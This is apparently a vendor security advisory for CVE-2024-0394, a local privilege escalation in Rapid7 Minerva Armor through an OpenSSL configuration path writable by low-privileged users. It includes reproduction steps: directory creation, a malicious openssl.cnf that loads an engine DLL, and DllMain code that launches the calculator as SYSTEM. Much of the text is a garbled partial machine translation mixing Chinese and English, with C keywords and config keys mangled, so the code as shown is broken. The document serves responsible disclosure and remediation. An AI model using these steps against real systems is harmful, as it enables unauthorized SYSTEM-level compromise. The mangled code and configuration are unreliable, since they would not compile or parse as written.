最后更新于2024年4月5日(星期五)20:45:32 GMT
Rapid7公开了CVE-2024-0394, a privilege escalation vulnerability in Rapid7 Minerva’s Armor product family. Minerva uses the open-source OpenSSL library for cryptographic functions 和 to support secure communications. The root cause of this vulnerability is Minerva’s implementation of OpenSSL’s OPENSSLDIR parameter, which was set to a path accessible to low-privileged users (如 C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf). Rapid7 has assessed this vulnerability as having a CVSSv3 score of 7.8.
影响
Since Minerva Armor operates as a Windows service, this vulnerability enables any authenticated user to elevate privileges 和 execute arbitrary code with SYSTEM privileges. 低权限攻击者可以创建 openssl.cnf configuration file to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.
信贷
Rapid7要感谢Will Dormann Vul实验室 for disclosing this vulnerability to us in accordance with Rapid7的漏洞披露策略. We are grateful to Will 和 the security research community for their work to make software 和 systems safer for everyone.
产品描述
Minerva Armor technology is a core endpoint security component (Windows only) aimed at preventing evasive malware, ransomware, 高级网络攻击. Armor is operated 和 trusted by SMBs 和 enterprise organizations around the world across a diversity of sectors 和 verticals.
Minerva Armor technology was developed by Minerva Labs, which was 被Rapid7收购 2023年3月. Armor is part of a product family that includes Minerva Armor 和 Rapid7 next-generation antivirus (NGAV). Armor was previously used as an OEM component in Intego AV. 注意: The Insight agent is not vulnerable to this issue.
剥削
During the Armor 32-bit service startup (MVArmorService32.exe), Armor加载OpenSSL库. OpenSSL is a library that provides a variety of cryptographic functions. This library has an internal directory tree that is used to locate the configuration file; this directory is called OPENSSLDIR. Inside OPENSSLDIR resides the configuration file openssl.cnf. This is where the privilege escalation opportunity begins.
When the application is dependent on the OpenSSL library, it is necessary to indicate the full path to OPENSSLDIR at compile-time, 但是在运行时, 这条路径是不必要的. 因此, it is possible to discover the full path using reverse engineering techniques 和 tools, 比如字符串, ProcMon, 和其他人.
如果攻击者可以放置 openssl.cnf file 和 specify a malicious library for loading, the attacker's code is executed instead. The root cause of this vulnerability lies in the OpenSSL library’s configuration in Minerva, where the OPENSSLDIR parameter was set to a path accessible to low-privileged users, 如 C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static\openssl.cnf. 因为Armor是作为Windows服务运行的, this vulnerability enables any authenticated user to elevate privileges 和 execute arbitrary code with SYSTEM privileges. 低权限用户可以创建openssl.cnf configuration file mentioned above to load a malicious OpenSSL engine library, resulting in arbitrary code execution as SYSTEM when the service starts.
Below is a ProcMon capture of the Armor service looking for the openssl.cnf 文件:
繁殖的步骤
All steps are executed as a low-privileged authenticated user:
- Create a “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static” directory:
mkdir “C:\git\vcpkg\packages\openssl_x86-windows-static-vs2019-static” - 创建一个
.cnf文件内容如下:
Openssl_conf = openssl_init . conf
(openssl_init)
引擎= engine_section
(engine_section)
Woot = woot_section
(woot_section)
Engine_id = woot
Dynamic_path = c:\\danik\\calc.dll文件
Init = 0
- 创建c:\danik文件夹:
mkdir“C: \ danik” - Compile 和 link a malicious “OpenSSL library” — the code below will run Windows calculator:
#include
BOOL WINAPI DllMain(
实例句柄hinstDLL,
DWORD fdwReason,
LPVOID(保存)
{
switch(fdwReason)
{
案例DLL_PROCESS_ATTACH:
系统(“钙”);
打破;
案例DLL_THREAD_ATTACH:
//执行线程特定的初始化.
打破;
案例DLL_THREAD_DETACH:
//执行特定于线程的清理.
打破;
案例DLL_PROCESS_DETACH:
//执行任何必要的清理.
打破;
}
return TRUE; // 成功ful DLL_PROCESS_ATTACH.
}
- 复制
calc.dll文件从上面的“C:\danik”目录. - 重新启动Armor服务或整个机器.
修复
To remediate CVE-2024-0394, 密涅瓦的客户 should update the latest release:
| 客户 | 修复版本 |
|---|---|
| 密涅瓦的客户 | 装甲4版.5.5 |
| 密涅瓦装甲OEM客户 | 装甲OEM版本4.5.5 |
披露时间表
2024年1月8日: Will Dormann向Rapid7报告的问题 Vul实验室
2024年1月9日: Rapid7确认报告
2024年1月11日: Rapid7 reproduces issue, confirms vulnerability
2024年1月至2月: Rapid7工程团队开发和测试修复, requests information from partner on potentially vulnerable implementation; partner confirms they are no longer offering vulnerable implementation.
2024年3月12日: Rapid7 contacts reporter to ask whether our fix timeline had been previously communicated
2024年3月19日: Rapid7 assigns CVE, updates reporter on fix readiness, confirms affected/fixed versions. Rapid7 和 reporter agree on April 3, 2024 as a coordinated disclosure date.
2024年4月3日: This disclosure; fix released.
